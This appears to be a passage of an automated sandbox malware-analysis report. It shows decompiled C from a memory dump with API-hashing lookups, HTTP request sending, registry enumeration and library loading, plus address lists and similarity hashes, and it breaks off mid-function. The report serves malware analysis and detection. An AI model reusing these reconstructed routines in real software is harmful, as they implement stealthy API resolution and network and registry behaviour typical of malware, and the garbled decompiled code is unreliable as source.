										 *((intOrPtr*)(_t39 + 0x18)) = _a364;
										 *((intOrPtr*)(_t39 + 0x1c)) = _a380;
										return _t39;
									} else {
										goto L9;
									}
									L8:
									asm("o16 nop [eax+eax]");
									_t56 =  *((intOrPtr*)(_t56 + 0x180));
								} while (_t56 != 0);
								goto L9;
							}
						}
					}
					if(__edx == 0) {
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						__ecx = __ebx;
						__eax = __ecx;
						while( *((intOrPtr*)(__eax + __edx + 8)) != 0xc4b8bd35) {
							__ecx = __ecx + 1;
							__eax = __eax + 0x18;
							if(__ecx < 0x10) {
								continue;
							}
							goto L25;
						}
						__edx =  *((intOrPtr*)(__eax + __edx + 0x14));
						if(__edx != 0) {
							goto L29;
						}
						goto L26;
						L25:
						asm("o16 nop [eax+eax]");
						__edx =  *((intOrPtr*)(__edx + 0x180));
					} while (__edx != 0);
					goto L26;
				}
				L1:
				_t64 = _t47;
				goto L2;
			}

0x008a430f
0x008a4313
0x008a444c
0x008a4459
0x008a4466
0x008a4466
0x008a4319
0x008a4319
0x008a4325
0x008a44f6
0x008a435a
0x008a435a
0x008a435f
0x008a4365
0x008a436c
0x008a44c0
0x008a44c5
0x008a44cc
0x008a44d2
0x008a44d7
0x008a44dd
0x008a44dd
0x008a44cc
0x008a4376
0x008a4420
0x008a4420
0x008a4424
0x008a4431
0x008a4437
0x008a443e
0x008a443e
0x00000000
0x008a437c
0x008a437c
0x008a437f
0x008a4384
0x008a438d
0x008a438f
0x008a4391
0x00000000
0x00000000
0x008a439a
0x008a439e
0x008a43a2
0x00000000
0x00000000
0x008a43a4
0x008a43a8
0x008a44b6
0x008a43ae
0x008a43b3
0x008a44ac
0x008a43b9
0x008a43be
0x008a44a2
0x008a43c4
0x008a43c9
0x008a4498
0x008a43cf
0x008a43d4
0x008a43f3
0x008a43d6
0x008a43db
0x008a43e4
0x008a43ee
0x008a43dd
0x008a43dd
0x008a43dd
0x008a43db
0x008a43d4
0x008a43c9
0x008a43be
0x008a43b3
0x008a43f8
0x008a43fc
0x008a4409
0x008a440f
0x008a4416
0x008a4416
0x008a4042
0x008a4042
0x008a4047
0x008a404a
0x008a4056
0x008a41cf
0x008a408b
0x008a4090
0x008a4096
0x008a409a
0x008a41a6
0x008a41b1
0x008a41b7
0x008a41b7
0x008a41a6
0x008a40a2
0x00000000
0x008a40a4
0x008a40ab
0x008a40b3
0x00000000
0x008a40b3
0x008a405c
0x008a405e
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4060
0x008a4060
0x008a4060
0x008a4062
0x008a4064
0x008a4072
0x008a4073
0x008a4079
0x00000000
0x00000000
0x00000000
0x008a4079
0x008a41be
0x008a41c4
0x008a40b5
0x008a40b7
0x008a40c1
0x008a40c1
0x008a40c3
0x008a40c3
0x008a40eb
0x008a40ef
0x008a40f2
0x008a40f5
0x008a40f8
0x008a4107
0x008a41ca
0x00000000
0x008a41ca
0x008a407b
0x008a407b
0x008a4081
0x008a4087
0x00000000
0x008a4060
0x008a4056
0x008a4376
0x008a432d
0x00000000
0x00000000
0x00000000
0x00000000
0x008a432f
0x008a432f
0x008a432f
0x008a4331
0x008a4333
0x008a4341
0x008a4342
0x008a4348
0x00000000
0x00000000
0x00000000
0x008a4348
0x008a44e5
0x008a44eb
0x00000000
0x00000000
0x00000000
0x008a434a
0x008a434a
0x008a4350
0x008a4356
0x00000000
0x008a432f
0x008a4040
0x008a4040
0x00000000

APIs

GetSystemInfo.KERNEL32(?), ref: 008A40C1

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 994f5b80e2805cec8634bccacf75fa5c09bb21182e4c99f23a4c02da2f1935ce
Instruction ID: cd79a26957ec80a20da4b74401af6bc260fc89e8f0979b838d7947fe0b870b6b
Opcode Fuzzy Hash: 994f5b80e2805cec8634bccacf75fa5c09bb21182e4c99f23a4c02da2f1935ce
Instruction Fuzzy Hash: 0851D230A042408BFF289A18C495BAE7291FBC6304F29A56DD549D7B96EBB4CC80D742

Uniqueness

Uniqueness Score: -1.00%

Function 008C3820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E008C3820(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				long _t52;
				int _t53;
				intOrPtr _t59;
				void* _t67;
				intOrPtr* _t95;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t109;
				intOrPtr* _t110;

				_t110 = _t109 - 0x60;
				_t107 = __ecx;
				_t39 =  *((intOrPtr*)(__ecx + 8));
				if(_t39 == 0 || _t39 == 0xffffffff) {
					_t40 = 1;
				} else {
					_t40 = 0;
				}
				if(_t40 != 0) {
					L26:
					_push(0);
					E008B9350( *((intOrPtr*)(_t110 + 0x78)));
					return  *((intOrPtr*)(_t110 + 0x74));
				} else {
					_t43 =  *((intOrPtr*)(_t107 + 0x10));
					if(_t43 == 0 || _t43 == 0xffffffff) {
						_t44 = 1;
					} else {
						_t44 = 0;
					}
					if(_t44 != 0) {
						goto L26;
					} else {
						_t75 = _t107 + 0x28;
						E008B7660(_t107 + 0x28, _t110 + 0x3c, 0x8c9424);
						E008A87A0(_t110 + 0x44);
						_t48 = E008A15C0(0xd27f045a, 0x336e58dc);
						_t98 = _t48;
						if(_t48 != 0) {
							 *_t110 =  *((intOrPtr*)(_t107 + 0x10));
							 *((intOrPtr*)(_t110 + 0xc)) =  *((intOrPtr*)(_t110 + 0x44));
							_t102 =  *((intOrPtr*)(_t107 + 0x28));
							 *(_t110 + 8) = E008B0180( *((intOrPtr*)(_t110 + 0x44)), 0x7fffffff, _t102);
							if(E008B9650( *((intOrPtr*)(_t110 + 0x78))) != 0) {
								 *((intOrPtr*)(_t110 + 4)) = E008B9640( *((intOrPtr*)(_t110 + 0x7c)), 0);
							} else {
								 *((intOrPtr*)(_t110 + 4)) = 0;
							}
							_t52 = E008B9650( *((intOrPtr*)(_t110 + 0x78)));
							_t103 =  !=  ?  *((void*)(_t110 + 0x18)) : _t102;
							_t53 = HttpSendRequestW( *(_t110 + 0x10),  !=  ?  *((void*)(_t110 + 0x18)) : _t102,  *(_t110 + 0x10),  *(_t110 + 8), _t52); // executed
							if(_t53 == 0) {
								_t104 = E008A7F00();
								E008B7560(_t75, _t98, _t104);
								if(_t104 != 0) {
									goto L12;
								} else {
									goto L17;
								}
							} else {
								E008B7560(_t75, _t98, _t103);
								L17:
								 *(_t110 + 0x50) = 4;
								_t95 = E008A15C0(0xd27f045a, 0xcedbd48c);
								if(_t95 == 0) {
									_t59 = 0x7f;
									goto L24;
								} else {
									_t105 = _t110 + 0x50;
									_push(0);
									_push(_t105);
									_push(_t110 + 0x4c);
									_push(0x20000013);
									_push( *((intOrPtr*)(_t107 + 0x10)));
									if( *_t95() == 0) {
										_t59 = E008A7F00();
										if(_t59 != 0) {
											L24:
											 *_t107 = _t59;
											E008A8CA0(_t110 + 0x44);
											goto L25;
										} else {
											goto L19;
										}
									} else {
										L19:
										 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t110 + 0x4c));
										E008A8810(_t110 + 0x38, 0x2800);
										 *(_t110 + 0x50) =  *(_t110 + 0x38) >> 1;
										_t67 = E008A15C0(0xd27f045a, 0xcedbd48c);
										if(_t67 == 0) {
											 *_t107 = 0x7f;
											E008A8CA0(_t110 + 0x34);
											E008A8CA0(_t110 + 0x44);
											goto L25;
										} else {
											_push(0);
											_push(_t105);
											_push( *((intOrPtr*)(_t110 + 0x3c)));
											_push(0x14);
											_push( *((intOrPtr*)(_t107 + 0x10)));
											asm("int3");
											return _t67;
										}
									}
								}
							}
						} else {
							_t104 = 0x7f;
							E008B7560(_t75, _t98, 0x7f);
							L12:
							 *_t107 = _t104;
							E008A8CA0(_t110 + 0x44);
							L25:
							E008B0B10(_t110 + 0x3c);
							goto L26;
						}
					}
				}
			}

0x008c3824
0x008c3827
0x008c3829
0x008c382e
0x008c3839
0x008c3835
0x008c3835
0x008c3835
0x008c3840
0x008c3bba
0x008c3bba
0x008c3bc0
0x008c3bd0
0x008c3846
0x008c3846
0x008c384b
0x008c3856
0x008c3852
0x008c3852
0x008c3852
0x008c385d
0x00000000
0x008c3863
0x008c3863
0x008c3872
0x008c387f
0x008c388e
0x008c3893
0x008c3897
0x008c38c2
0x008c38c5
0x008c38c9
0x008c38d1
0x008c38e0
0x008c3ca0
0x008c38e6
0x008c38e6
0x008c38e6
0x008c38f2
0x008c3902
0x008c390c
0x008c3910
0x008c3c7f
0x008c3c83
0x008c3c8a
0x00000000
0x008c3c90
0x00000000
0x008c3c90
0x008c3916
0x008c3918
0x008c391d
0x008c391d
0x008c3934
0x008c3938
0x008c3ba0
0x00000000
0x008c393e
0x008c393e
0x008c3946
0x008c3948
0x008c3949
0x008c394a
0x008c394f
0x008c3956
0x008c3c68
0x008c3c6f
0x008c3ba5
0x008c3ba5
0x008c3bac
0x00000000
0x008c3c75
0x00000000
0x008c3c75
0x008c395c
0x008c395c
0x008c3965
0x008c396c
0x008c3977
0x008c3985
0x008c398c
0x008c3b89
0x008c3b90
0x008c3b99
0x00000000
0x008c3992
0x008c3992
0x008c3994
0x008c3995
0x008c3999
0x008c399b
0x008c399e
0x008c399f
0x008c399f
0x008c398c
0x008c3956
0x008c3938
0x008c3899
0x008c389b
0x008c38a0
0x008c38a5
0x008c38a5
0x008c38ac
0x008c3bb1
0x008c3bb5
0x00000000
0x008c3bb5
0x008c3897
0x008c385d

APIs

HttpSendRequestW.WININET(D27F045A,?,D27F045A,?,00000000,D27F045A,336E58DC,?), ref: 008C390C

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 66b2218d284ef471ae6002dc57814bd64af41ba6af1ea1b13dca059b3d84ce47
Instruction ID: f96797fdb46daaed2fcade4e5444da26f578ea8cc277ae6e8aa4078d49320ec6
Opcode Fuzzy Hash: 66b2218d284ef471ae6002dc57814bd64af41ba6af1ea1b13dca059b3d84ce47
Instruction Fuzzy Hash: A3513C30608205ABEB10AE28CC51FAB7BF5FF85754F10892DB955D7391EA31DD06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008BC580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008BC580(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				int _v20;
				char _v28;
				int* _v32;
				int* _v36;
				char _v40;
				char _v48;
				char _v303;
				void* __edi;
				void* __esi;
				long _t25;
				signed int _t33;
				char _t45;
				int _t62;
				intOrPtr _t63;
				char* _t64;
				char* _t66;

				_v40 = 0;
				_t62 = 0;
				_v36 = 0;
				_t63 = __ecx;
				_v32 = 0;
				_t64 = _t66;
				while(1) {
					_v20 = 0x105;
					if(E008A15C0(0x3ab94787, 0x31fb9d90) == 0) {
						goto L3;
					}
					_t25 = RegEnumValueA( *(_t63 + 4), _t62, _t64,  &_v20, 0, 0, 0, 0); // executed
					if(_t25 == 0) {
						goto L3;
					}
					_t45 = _v40;
					_t26 = 0;
					if(_t45 <= 0) {
						L9:
						E008B0930(_a4, _t26, _t26);
						E008B7560( &_v48, _t62, _t63);
						return _v4;
					} else {
						_t63 = _t45;
						_t65 = 0;
						_t62 =  &_v28;
						while(1) {
							E008B1240(E008B7600( &_v40, _t65), _t62);
							_t40 = _v36;
							_t33 = E008BD620(_t40, E008B6040(_v36, 0x7fffffff));
							E008B0B10(_t62);
							if((_t33 ^ 0x38ba5c7b) == _v0) {
								break;
							}
							_t65 =  &_v303;
							if( &_v303 < _t63) {
								continue;
							} else {
								_t26 = 0;
								goto L9;
							}
							goto L11;
						}
						E008B0750(_v0, E008B7600( &_v40, _t65));
						E008B7560( &_v48, _t62, _t63);
						return _v4;
					}
					L11:
					L3:
					E008B37E0( &_v40, _t64, _v40);
					_t62 = _t62 + 1;
				}
			}

0x008bc58e
0x008bc595
0x008bc597
0x008bc59e
0x008bc5a0
0x008bc5a7
0x008bc5aa
0x008bc5aa
0x008bc5c8
0x00000000
0x00000000
0x008bc5db
0x008bc5df
0x00000000
0x00000000
0x008bc5f8
0x008bc5ff
0x008bc603
0x008bc662
0x008bc66b
0x008bc677
0x008bc68d
0x008bc605
0x008bc607
0x008bc609
0x008bc60b
0x008bc612
0x008bc622
0x008bc627
0x008bc63e
0x008bc647
0x008bc659
0x00000000
0x00000000
0x008bc65b
0x008bc65e
0x00000000
0x008bc660
0x008bc660
0x00000000
0x008bc660
0x00000000
0x008bc65e
0x008bc6a7
0x008bc6b3
0x008bc6c9
0x008bc6c9
0x00000000
0x008bc5e1
0x008bc5f0
0x008bc5f5
0x008bc5f5

APIs

RegEnumValueA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,3AB94787,31FB9D90,?,?,3AB94787,31FB9D90), ref: 008BC5DB

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: ba2a740820d52dbdc197a3ff1383e4a4d127e2da814062f69d33e0f1834dfbb0
Instruction ID: d17deb16808dbee84ae3001a9ae309f7003cf8670ccc6fdbeee88bb55fd6d088
Opcode Fuzzy Hash: ba2a740820d52dbdc197a3ff1383e4a4d127e2da814062f69d33e0f1834dfbb0
Instruction Fuzzy Hash: 1D316D716082445BD375EA6DD891AEFB3D9FBD9300F10493DB18AC3341EE71AD458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 008BC405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E008BC405(intOrPtr __eax, void* __edi, intOrPtr __ebp, void* _a8, int _a12, void* _a16, void* _a20, void** _a28, void** _a32, void** _a36, char _a40, unsigned int _a44, char _a48, void** _a52, void* _a64, void* _a68) {
				unsigned int _v0;
				void* _v4;
				unsigned int _v8;
				void* _v20;
				void* _v28;
				void* _t41;
				intOrPtr* _t42;
				void** _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;

				_t51 = __ebp;
				_t49 = __eax;
				if(__eax != 0) {
					_t42 = _a16;
					goto L1;
				} else {
					do {
						__edx =  &_a48;
						__ecx =  &_a40;
						__eax = E008AA0D0( &_a40,  &_a48);
						__edx = _a44;
						__ecx =  &_a52;
						__eax = E008A83B0( &_a52);
						__esi = _a52;
						__ecx = __esi;
						__edx = 0x7fffffff;
						__eax = E008B6040(__esi, 0x7fffffff);
						__ecx = __esi;
						__edx = __eax;
						__esi = __eax;
						__ecx =  &_a52;
						__eax = E008B0B10( &_a52);
						if(__esi != __edi) {
							__ecx =  &_a48;
							__eax = E008A8CA0( &_a48);
							__ebx = __ebx + 1;
							goto L12;
						} else {
							__edi = _a36;
							__ecx =  &_a48;
							__esi =  *(__ecx - 0x10);
							__eax = E008A8CA0(__ecx);
							if(__edi != 0) {
								__ecx =  *(__esp + 0x1c);
								__eax = E008A96D0( *(__esp + 0x1c), 0x5c);
							}
							__ecx =  *(__esp + 0x20);
							__eax = E008B0220( *(__esp + 0x20), _a40, 0);
							_a12 = 0;
							__eax = E008A15C0(0x3ab94787, 0xd5493f9);
							__edx = __eax;
							if(__eax == 0) {
								__edx = 0;
							} else {
								__eax =  &_a20;
								__ecx =  *(__eax - 0xc);
								__ecx =  ==  ?  *((void*)(__eax - 0x10)) :  *(__eax - 0xc);
								__ebx = __eax[1];
								__eax = RegOpenKeyExW( *(__esp + 0x68),  *(__eax[1]), 0, __ecx, __eax); // executed
								__edx = __eax;
							}
							__ebx = _a20;
							if(__ebx == 0 || __ebx == 0xffffffff) {
								L34:
								__ebx = _a16;
								__esi = __edx;
								L1:
								if( *((char*)(_t42 + 8)) == 0) {
									L9:
									 *((intOrPtr*)(_t42 + 4)) = _t51;
									 *((char*)(_t42 + 8)) = 1;
									E008A8CA0( &_a40);
									 *_t42 = _t49;
									return _t49;
								} else {
									_t48 =  *((intOrPtr*)(_t42 + 4));
									if(_t48 == 0 || _t48 == 0xffffffff) {
										_t45 = 1;
									} else {
										_t45 = 0;
									}
									if(_t45 != 0) {
										goto L9;
									} else {
										_t41 = E008A15C0(0x3ab94787, 0x91935d4e);
										if(_t41 == 0) {
											goto L9;
										} else {
											_push(_t48);
											asm("int3");
											return _t41;
										}
									}
								}
							} else {
								if(__esi == 0) {
									L30:
									__edi =  &(__edi[0]);
									__ebp = __ebx;
									if(__edi < _a28) {
										__esi = 1;
										__eax = __edi * 4;
										__ecx =  *(__esp + 0x58);
										__eax = E008B9640( *(__esp + 0x58), __edi * 4);
										__eax =  *__eax;
										__ebx = 0;
										__eax = __eax ^ 0x38ba5c7b;
										_a32 = __edi;
										__edi = __eax;
										_a28 = 1;
										goto L12;
									} else {
										goto L34;
									}
								} else {
									if(__ebp == 0 || __ebp == 0xffffffff) {
										__eax = 1;
									} else {
										__eax = 0;
									}
									if(__eax != 0) {
										goto L30;
									} else {
										_v0 = __edx;
										__eax = E008A15C0(0x3ab94787, 0x91935d4e);
										__edx = _v8;
										if(__eax == 0) {
											goto L30;
										} else {
											_push(__ebp);
											_v0 = __edx;
											asm("int3");
											return __eax;
										}
									}
								}
							}
						}
						goto L35;
						L12:
						__eax = E008A15C0(0x3ab94787, 0xf561ae8b);
					} while (__eax == 0);
					__edx = _a44;
					__edx = _a44 >> 1;
					_push(_a44 >> 1);
					_push(_a40);
					_push(__ebx);
					_push(__ebp);
					asm("int3");
					return __eax;
				}
				L35:
			}

0x008bc405
0x008bc405
0x008bc409
0x008bc52e
0x00000000
0x008bc40f
0x008bc40f
0x008bc40f
0x008bc414
0x008bc418
0x008bc41d
0x008bc421
0x008bc425
0x008bc42a
0x008bc42e
0x008bc430
0x008bc435
0x008bc43a
0x008bc43c
0x008bc443
0x008bc445
0x008bc449
0x008bc450
0x008bc51f
0x008bc523
0x008bc528
0x00000000
0x008bc456
0x008bc456
0x008bc45a
0x008bc45e
0x008bc461
0x008bc468
0x008bc46c
0x008bc470
0x008bc470
0x008bc47b
0x008bc47f
0x008bc484
0x008bc496
0x008bc49b
0x008bc49f
0x008bc4c3
0x008bc4a1
0x008bc4a5
0x008bc4a9
0x008bc4ac
0x008bc4b4
0x008bc4bd
0x008bc4bf
0x008bc4bf
0x008bc4c5
0x008bc4cb
0x008bc537
0x008bc537
0x008bc53b
0x008bc337
0x008bc33b
0x008bc36c
0x008bc36c
0x008bc373
0x008bc377
0x008bc37c
0x008bc387
0x008bc33d
0x008bc33d
0x008bc342
0x008bc34d
0x008bc349
0x008bc349
0x008bc349
0x008bc354
0x00000000
0x008bc356
0x008bc360
0x008bc367
0x00000000
0x008bc369
0x008bc369
0x008bc36a
0x008bc36b
0x008bc36b
0x008bc367
0x008bc354
0x008bc4d2
0x008bc4d4
0x008bc510
0x008bc510
0x008bc511
0x008bc517
0x008bc3ba
0x008bc3bf
0x008bc3c7
0x008bc3cb
0x008bc3d0
0x008bc3d2
0x008bc3d4
0x008bc3d9
0x008bc3dd
0x008bc3df
0x00000000
0x008bc51d
0x00000000
0x008bc51d
0x008bc4d6
0x008bc4d8
0x008bc4e3
0x008bc4df
0x008bc4df
0x008bc4df
0x008bc4ea
0x00000000
0x008bc4ec
0x008bc4f6
0x008bc4fa
0x008bc4ff
0x008bc504
0x00000000
0x008bc506
0x008bc506
0x008bc507
0x008bc50b
0x008bc50c
0x008bc50c
0x008bc504
0x008bc4ea
0x008bc4d4
0x008bc4cb
0x00000000
0x008bc3e3
0x008bc3ed
0x008bc3f2
0x008bc3f6
0x008bc3fa
0x008bc3fc
0x008bc3fd
0x008bc401
0x008bc402
0x008bc403
0x008bc404
0x008bc404
0x00000000

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000,3AB94787,0D5493F9,?,00000000), ref: 008BC4BD

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3dbe6f25ff54ebab37288e8af040a9a84130653229134a99384eae07c0fb49c0
Instruction ID: c9e3a1c20579472c27fefe2d601ffc2012bc911fabe0a005ed0faa32c85c977e
Opcode Fuzzy Hash: 3dbe6f25ff54ebab37288e8af040a9a84130653229134a99384eae07c0fb49c0
Instruction Fuzzy Hash: 74218031608301ABCB25DE24C895AAFB3E5FFC5754F144A1CF566DB391EA30ED058B92

Uniqueness

Uniqueness Score: -1.00%

Function 0089543B, Relevance: 1.6, APIs: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0089543B(void* __eax, void* __ebx, void* __edi) {
				signed int _t133;
				void* _t136;
				signed int _t144;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr* _t177;
				void* _t192;
				void* _t202;
				intOrPtr _t205;
				signed int _t215;
				signed int _t219;
				void* _t234;
				intOrPtr* _t235;
				signed int _t238;
				unsigned int _t242;
				intOrPtr _t245;
				signed short* _t246;
				signed int _t249;
				void* _t267;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t328;
				intOrPtr* _t336;
				signed int _t351;
				signed int _t353;
				signed int _t356;
				intOrPtr* _t388;
				signed int _t404;
				void* _t409;
				signed int _t410;
				intOrPtr* _t413;
				void* _t416;
				intOrPtr* _t419;

				_t403 = __edi;
				_t276 = __ebx + 0x8c;
				 *0x8cb1d0 = 0;
				_t413 = E008A3930(_t276, 0, __edi, _t407);
				if( *_t413 < 0x10) {
					E00895150();
				}
				E00896020(_t276);
				E008A8810(_t419 + 0x114, 0x200);
				_t388 = E008A15C0(0xa1310f65, 0xc4d11e8a);
				if(_t388 != 0) {
					 *_t388(0,  *(_t419 + 0x114),  *(_t419 + 0x114) >> 1);
				}
				E008A2580(_t419 + 0x118, _t403, _t407);
				if(E008A9C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0x118))) == 0) {
					E008A2780(_t419 + 0xe4, _t403, _t407);
					_t133 = E008A9C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0xe4)));
					__eflags = _t133;
					if(_t133 == 0) {
						E008A2580(_t419 + 0xb4, _t403, _t407);
						_t407 = _t419 + 0x98;
						E008AD980(_t419 + 0xbc, _t419 + 0x98, 0x5c);
						_t136 = E008B7600(_t419 + 0x98, 2);
						E0089AC00(_t419 + 0xbc, 6);
						E008A8CC0(_t136,  *((intOrPtr*)(_t419 + 0xbc)));
						E008A8CA0(_t419 + 0xbc);
						E008B89F0(_t407, _t419 + 0x124, 0x5c);
						E008B8910(_t407, _t403, _t407);
						E008A8CA0(_t419 + 0xb4);
						_t144 = E008A9C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0x120)));
						__eflags = _t144;
						_t23 = _t144 > 0;
						__eflags = _t23;
						_t279 = 0 | _t23;
						E008A8CA0(_t419 + 0x120);
					} else {
						_t279 = 1;
					}
					E008A8CA0(_t419 + 0xe4);
					E008A8CA0(_t419 + 0x118);
					__eflags = _t279;
					if(_t279 == 0) {
						_t280 = 0;
						__eflags = 0;
					} else {
						goto L11;
					}
				} else {
					E008A8CA0(_t419 + 0x118);
					L11:
					_t280 = 1;
				}
				E0089AC00(_t419 + 0x120, 2);
				E008AD980(_t419 + 0x128, _t419 + 0x130, 0x7e);
				E008A8CA0(_t419 + 0x120);
				if( *(_t419 + 0x130) > 0) {
					 *_t419 = _t413;
					_t404 = _t419 + 0x130;
					L15:
					while(1) {
						L15:
						while(1) {
							L15:
							if(E008A15C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E008B7600(_t404, _t407))); // executed
							}
							_t267 =  *(_t419 + 0x130);
							while(1) {
								_t407 = 1;
								if(1 >= _t267) {
									break;
								}
								if(1 != 4) {
									goto L15;
								} else {
									_t391 =  *0x8cb02a & 0x000000ff;
									if(( *0x8cb02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L23;
							}
							_t413 =  *_t419;
							goto L23;
						}
					}
				}
				L23:
				__eflags =  *((intOrPtr*)(_t413 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t413 + 0x2c)) != 2) {
					__eflags =  *0x8cb028 & 0x000000ff;
					if(( *0x8cb028 & 0x000000ff) == 0) {
						__eflags =  *0x8cb265 & 0x000000ff;
						if(( *0x8cb265 & 0x000000ff) == 0) {
							__eflags =  *0x8cb1cc - 1;
							if( *0x8cb1cc != 1) {
								_t245 =  *0x8cb1d0; // 0x3277c8
								_t246 =  *(_t245 + 4);
								_t391 =  *_t246 & 0x0000ffff;
								__eflags = ( *_t246 & 0x0000ffff) - 0x2d;
								if(( *_t246 & 0x0000ffff) != 0x2d) {
									E008A8AB0(_t419 + 0xcc, _t246, 0);
									_push(0x80);
									_push(0);
									E008BA4E0(_t419 + 0x68, __eflags,  *((intOrPtr*)(_t419 + 0xd0)), 1);
									_t249 = E008BBEA0(_t419 + 0x64, _t391, _t407);
									__eflags = _t249;
									if(_t249 == 0) {
										__eflags =  *((char*)(_t419 + 0x68));
										if( *((char*)(_t419 + 0x68)) != 0) {
											E008BBE30(_t419 + 0x64, _t407);
										}
										E008A8CA0(_t419 + 0x58);
										_t410 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E008BA730(_t419 + 0xc4, _t391);
											if(__eflags == 0) {
												break;
											}
											E008A22A0(0x64, _t391);
											_t410 = _t410 + 1;
											__eflags = _t410 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t407 = _t419 + 0xcc;
										do {
											E008AAE80(_t419 + 0xcc, __eflags, _t407, 0x5c);
											E008A8CC0(_t419 + 0xc8,  *(_t419 + 0xcc));
											E008A8CA0(_t407);
											__eflags = E008BA730(_t419 + 0xc4, _t391);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t419 + 0x68));
										if( *((char*)(_t419 + 0x68)) != 0) {
											E008BBE30(_t419 + 0x64, _t407);
										}
										E008A8CA0(_t419 + 0x58);
									}
									E008A8CA0(_t419 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x8cb02a & 0x000000ff) - 2;
					if(( *0x8cb02a & 0x000000ff) == 2) {
						L52:
						_t154 =  *0x8cb1ad; // 0xec1f98
						__eflags = _t154;
						if(_t154 == 0) {
							L54:
							_t155 =  *0x8cb1ad; // 0xec1f98
							__eflags = _t155;
							if(_t155 == 0) {
								_push(0x10);
								_t156 = E008A1030();
								_t419 = _t419 + 4;
								__eflags = _t156;
								if(_t156 != 0) {
									_push(0);
									_t157 = E008B9350(_t156);
								} else {
									_t157 = 0;
								}
								 *0x8cb1ad = _t157;
							}
							_t407 =  *0x8cb1ad; // 0xec1f98
							__eflags = ( *0x8cb02a & 0x000000ff) - 1;
							if(( *0x8cb02a & 0x000000ff) == 1) {
								_t391 = 0x18f8c844;
								_t404 = _t419 + 0x28;
								E00896AD0(_t280, _t404, 0x18f8c844, _t404, _t407, 1, 0); // executed
								_push(_t404);
								E008B9520(_t407);
								E008B9510(_t404);
							} else {
								E008B9710(_t407, 0x8cb02d,  *0x8cb02b & 0x0000ffff);
							}
						} else {
							_t353 =  *0x8cb1ad; // 0xec1f98
							_t219 = E008B9660(_t353);
							__eflags = _t219;
							if(_t219 != 0) {
								goto L54;
							}
						}
						_t162 =  *0x8cb1b1; // 0x0
						__eflags = _t162;
						if(_t162 == 0) {
							L60:
							_t163 =  *0x8cb1b1; // 0x0
							__eflags = _t163;
							if(_t163 == 0) {
								_push(0x10);
								_t164 = E008A1030();
								_t419 = _t419 + 4;
								__eflags = _t164;
								if(_t164 != 0) {
									_push(0);
									_t165 = E008B9350(_t164);
								} else {
									_t165 = 0;
								}
								 *0x8cb1b1 = _t165;
							}
							_t404 =  *0x8cb1b1; // 0x0
							__eflags = ( *0x8cb02a & 0x000000ff) - 1;
							if(( *0x8cb02a & 0x000000ff) == 1) {
								_t391 = 0x11041f01;
								E00896AD0(_t280, _t419 + 0x38, 0x11041f01, _t404, _t407, 1, 1);
								_push(_t419 + 0x38);
								E008B9520(_t404);
								E008B9510(_t419 + 0x38);
								_t172 = E008B9650(_t404);
								__eflags = _t172;
								if(_t172 != 0) {
									_t391 = 0xd3ef7577;
									E00896AD0(_t280, _t419 + 8, 0xd3ef7577, _t404, _t407, 0, 0);
									E008B9510(_t419);
								}
							} else {
								_t407 =  *0x8cb1c4; // 0x890000
								__eflags =  *((char*)(E008A3930(_t280, 0, _t404, _t407) + 0xb)) - 0x20;
								_t400 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t391 = _t407;
								E00899090(_t419 + 0x88, _t407,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t419 + 0x88);
								E008B9520(_t404);
								E008B9510(_t419 + 0x88);
							}
						} else {
							_t351 =  *0x8cb1b1; // 0x0
							_t215 = E008B9660(_t351);
							__eflags = _t215;
							if(_t215 != 0) {
								goto L60;
							}
						}
						_t173 =  *((intOrPtr*)(_t413 + 0x2c));
						__eflags = _t173 - 3;
						if(_t173 == 3) {
							__eflags =  *0x8cb1cc - 3;
							if( *0x8cb1cc == 3) {
